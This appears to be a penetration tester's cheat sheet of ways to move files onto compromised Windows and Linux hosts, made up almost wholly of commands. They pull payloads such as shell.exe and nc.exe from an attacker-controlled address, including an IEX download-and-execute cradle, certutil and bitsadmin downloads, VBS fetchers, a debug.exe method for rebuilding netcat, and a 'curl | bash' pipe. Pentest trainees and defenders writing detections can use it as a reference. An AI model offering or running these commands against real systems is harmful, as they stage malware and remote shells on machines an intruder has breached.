File Transfer Cheat Sheet

5 minute read

File transfer cheat sheet for Windows and Linux operating systems.

Serving Files For Transfer

The two main methods I use for serving files over HTTP are either via Apache, or the Python SimpleHTTPServer module.

To serve a file over Apache, copy said file into /var/www/html and enable the Apache service.
Apache is installed by default in kali:

root@kali:~/# cp file /var/www/html
root@kali:~/# service apache2 start  
// Apache is now ready to start serving files for transfer requests. 


My favourtie option is to start a Python webserver within my current working directory:

root@kali:~/# python -m SimpleHTTPServer 80  
// This will serve on port 80.  
// Alternative ports can be specified. 


Windows File Transfers


TFTP


TFTP client is installed by default on Windows machines up to Windows 2003. In Windows 7, Windows 2008, and above, this tool would have to be specifically added during installation.

root@kali:~# mkdir /tftp 
root@kali:~# atftpd --daemon --port 69 /tftp  // atftpd is a pre-installed TFTP server in kali.
root@kali:~# cp file /tftp/ 
// Compromised windows host
C:> tftp -i AttackerIP get file


FTP


It is possible to install a full-featured FTP server like vsftpd in kali. I find it far easier to use a simple FTP server using python.

The pytftpd library, similar to the HTTP one mentioned earlier, allows you to start a ftp server within your current working directory. Anonymous authentication is also accepted.

root@kali:~# apt-get install python-pyftpdlib 
root@kali:~# python -m pyftpdlib -p 21   


With the server up and running, we can transfer files interactively or non-interactively:

//Interactive
C:> ftp AttackerIP
Connected to AttackerIP
User: anonymous 
Password: anonymous
...
ftp> binary 
ftp> get shell.exe
//Non-Interactive
C:> echo open AttackerIP > c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo anonymous >> c:\ftp.txt
C:> echo binary >> c:\ftp.txt
C:> echo get shell.exe >> c:\ftp.txt
C:> echo bye >> c:\ftp.txt
C:> ftp -s:C:\ftp.txt


SMB


smbserver.py from the Impacket project can be used to launch a nice, simple SMB server on port 445.
All that’s needed is for you to specify a share name and the path to your file.

root@kali:/impacket/examples# python smbserver.py transfer_share /root/shells/shell.exe 

// We can then check that our SMB share is up and running from our compromised Windows host
C:> net view \\AttackerIP   // Our designated share name should be visible in the output

// Windows commands like dir and copy can also be used
C:> dir \\AttackerIP\transfer_share
C:> copy \\AttackerIP\transfer_share\shell.exe

//Executing shell.exe on compromised Windows host via our SMB share ~ transfer_share
C:> \\AttackerIP\transfer_share\shell.exe   


PowerShell


// Within PowerShell
PS:> Invoke-WebRequest -Uri "http:/AttackerIP/file" -OutFile "C:\path\to\file"

// Outside PowerShell
C:> powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://AttackerIP/file") 

// Non-Interactive PowerShell script
C:> echo $storageDir = $pwd > wget.ps1
C:> echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
C:> echo $url = "http://AttackerIP/file" >>wget.ps1 
C:> echo $file = "file" >>wget.ps1 
C:> echo $webclient.DownloadFile($url,$file) >>wget.ps1 
C:> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive NoProfile -File wget.ps1


OpenSSL


// Generate keys
root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

// Serve the file on kali
root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file

// Execute on Windows box to transfer file to C:\file
C:\path\to\openssl.exe s_client -quiet-connect AttackerIP:1234 > C:\file


certutil


C:> certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file


bitsadmin


C:> bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file


Visual Basic Script (VBS)


// Option 1:
// Paste each line seperately into Windows shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs 
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 
echo  Err.Clear >> wget.vbs 
echo  Set http = Nothing >> wget.vbs 
echo  Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 
echo  http.Open "GET", strURL, False >> wget.vbs 
echo  http.Send >> wget.vbs 
echo  varByteArray = http.ResponseBody >> wget.vbs 
echo  Set http = Nothing >> wget.vbs 
echo  Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 
echo  Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 
echo  strData = "" >> wget.vbs 
echo  strBuffer = "" >> wget.vbs 
echo  For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 
echo  ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 
echo  Next >> wget.vbs 
echo  ts.Close >> wget.vbs

C:> cscript wget.vbs http://AttackerIP/file


// Option 2:
// Change AttackerIP && SaveToFile location 
C:> echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://AttackerIP/file", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\file":objADOStream.Close > transfer.vbs

C:> cscript transfer.vbs


debug.exe


The debug.exe program acts as an assembler, disassembler, and a hex dumping tool. We’re able to take binaries like netcat ~ nc.exe and disassemeble them into hex.

A series of non-interactive echo commands will write out the binary file into its hex representation.

We can then use debug.exe to assemble the hex file into the original binary file nc.exe on the compromised host. There is a 64k size limit for transferable files.

root@kali:~# ls -l nc.exe 
-rwxr-xr-x 1 root root 59392 nc.exe


This is close to our limit. We can use upx ~ (executable packer) to compress it further:

root@kali:~# upx -9 nc.exe   
...
root@kali:~# ls -l nc.exe 
-rwxr-xr-x 1 root root 29184 nc.exe 


The file size is now more suitable for transfer and has been decreased in size by almost 50%.

We can now convert the nc.exe file into a text file usable by debug.exe on our compromised Windows host. The tool we’ll be using is exe2bat.exe

root@kali:~# cp /usr/share/windows-binaries/exe2bat.exe . // Change path of exe2bat.exe to our current working directory
root@kali:~# wine exe2bat.exe nc.exe nc.txt


This will produce a nc.txt file we can simply copy paste into the remote windows shell, and nc.exe will be automatically created on the compromised host.


Linux File Transfers


wget


wget http://AttackerIP/file -o /var/tmp/file    


curl


curl http://AttackerIP/file --output /var/tmp/file

curl AttackerIP/linenum.sh | bash                 


netcat


root@kail:~# nc -nlvp 1234 < file    // Start listener on kali

cat file | nc AttackerIP 1234          // Cat the file and pipe to our nc connection


fetch (freeBSD)


fetch -o /var/tmp/file "http://AttackerIP/file"   


Python


vim download.py:

#!/usr/bin/python 
import urllib2 

u = urllib2.urlopen('http://AttackerIP/file') 
localFile = open('local_file', 'w') 
localFile.write(u.read()) 
localFile.close()

$ chmod +x download.py  // Grant executable permission
$ python download.py   // Run on compromised Linux host


OpenSSL


Generate keys

root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes


Serve the file on kali

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file


Execute on Linux host to GET the file

$ openssl s_client -quiet-connect AttackerIP:1234 > file


socat


socat TCP4-LISTEN:8000,fork file:<file to transfer>  // server

socat TCP4:<ip>:8000 file:<file to get>,create   // client